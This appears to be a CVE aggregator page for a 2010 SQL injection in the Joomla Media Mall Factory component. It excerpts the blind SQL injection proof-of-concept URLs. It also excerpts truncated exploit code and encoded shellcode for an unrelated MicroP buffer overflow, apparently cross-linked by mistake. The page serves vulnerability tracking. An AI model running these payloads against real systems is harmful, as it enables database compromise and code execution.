CVE-2010-1600
published 2010-04-29CVE-2010-1600: SQL injection vulnerability in the Media Mall Factory (com_mediamall) component 1.0.4 for Joomla! allows remote attackers to execute arbitrary SQL commands via…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.19%
64.0th percentile
SQL injection vulnerability in the Media Mall Factory (com_mediamall) component 1.0.4 for Joomla! allows remote attackers to execute arbitrary SQL commands via the category parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| thefactory | com_mediamall | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow
exploitdb·2014-03-14
CVE-2010-5299 MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow
MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow
---
#!/usr/bin/env ruby
# Exploit Title:MicroP(.mppl) Local Stack Based Buffer Overflow
# Author:Necmettin COSKUN => twitter.com/babayarisi
# Blog : http://www.ncoskun.com http://www.grisapka.org
# Vendor :http://sourceforge.net/projects/microp/
# Software link:http://sourceforge.net/projects/microp/files/latest/download
# version: 0.1.1.1600
# Tested on: windows XP sp2
# 4ewa2getha! ;)
print "\n"
print "\n"
print " by\n"
print " _ _ _ v2 _ \n"
print " | |_ ___| |_ ___ _ _ ___ ___|_|___|_| \n"
print " | . | .'| . | .'| | | .'| _| |_ -| | \n"
print " |___|__,|___|__,|_ |__,|_| |_|___|_| \n"
print " |___| \n"
print " \n"
print "\n"
print "\n"
#shellcode = http://www.exploit-db.com/exploits/28996/
#User32-free Messagebox Shellcode f
Exploit-DB
MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow (Metasploit)
exploitdb·2011-07-07
CVE-2010-5299 MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow (Metasploit)
MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow (Metasploit)
---
##
# $Id: microp_mppl.rb 13114 2011-07-07 06:29:37Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based
buffer overflow occurs when the content of a .mppl file gets copied onto the stack,
which overwrites the lpFileName parameter of a CreateFileA() function, and results
arbitrary code execution under the context
Exploit-DB
MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow
exploitdb·2010-08-23
CVE-2010-5299 MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow
MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow
---
# Exploit Title: MicroP malicious MPPL Buffer Overflow
# Date: 08/23/10
# Author: james [AT] learnsecurityonline [DOT] com
# Software Link: http://sourceforge.net/projects/microp/
# Version: 0.1.1.1600
# Tested on: Windows XP SP3 EN
#! /usr/bin/evn ruby
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
boom = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70"
boom << "\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31"
boom << "\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4"
boom << "\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23"
boom << "\xf5\xf3\xb4\xae\x7d\x02\xaa\x3a\x32"
boom << "\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29"
boom << "\x21\xe7\x96\x60\xf5\x71\xca\x06\x35"
boom << "\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0"
boom <<
Exploit-DB
Joomla! Component Media Mall Factory 1.0.4 - Blind SQL Injection
exploitdb·2010-04-14
CVE-2010-1600 Joomla! Component Media Mall Factory 1.0.4 - Blind SQL Injection
Joomla! Component Media Mall Factory 1.0.4 - Blind SQL Injection
---
[o] Joomla Component Media Mall Factory Blind SQLi Vulnerability
Software : com_mediamall version 1.0.4
Vendor : http://www.thefactory.ro/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/index.php?option=com_mediamall&category=1[BSQL]
[o] PoC
http://localhost/index.php?option=com_mediamall&category=1+AND+SUBSTRING(@@version,1,1)=5 << true
http://localhost/index.php?option=com_mediamall&category=1+AND+SUBSTRING(@@version,1,1)=4 << false
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
skulmatic OLiBekaS ulga
No writeups or analysis indexed.
http://secunia.com/advisories/39546http://www.exploit-db.com/exploits/12234http://www.osvdb.org/63940http://www.packetstormsecurity.com/1004-exploits/joomlamediamallfactory-bsql.txthttp://www.securityfocus.com/bid/39488http://www.thefactory.ro/shop/joomla-components/media-mall.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/57906http://secunia.com/advisories/39546http://www.exploit-db.com/exploits/12234http://www.osvdb.org/63940http://www.packetstormsecurity.com/1004-exploits/joomlamediamallfactory-bsql.txthttp://www.securityfocus.com/bid/39488http://www.thefactory.ro/shop/joomla-components/media-mall.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/57906
2010-04-29
Published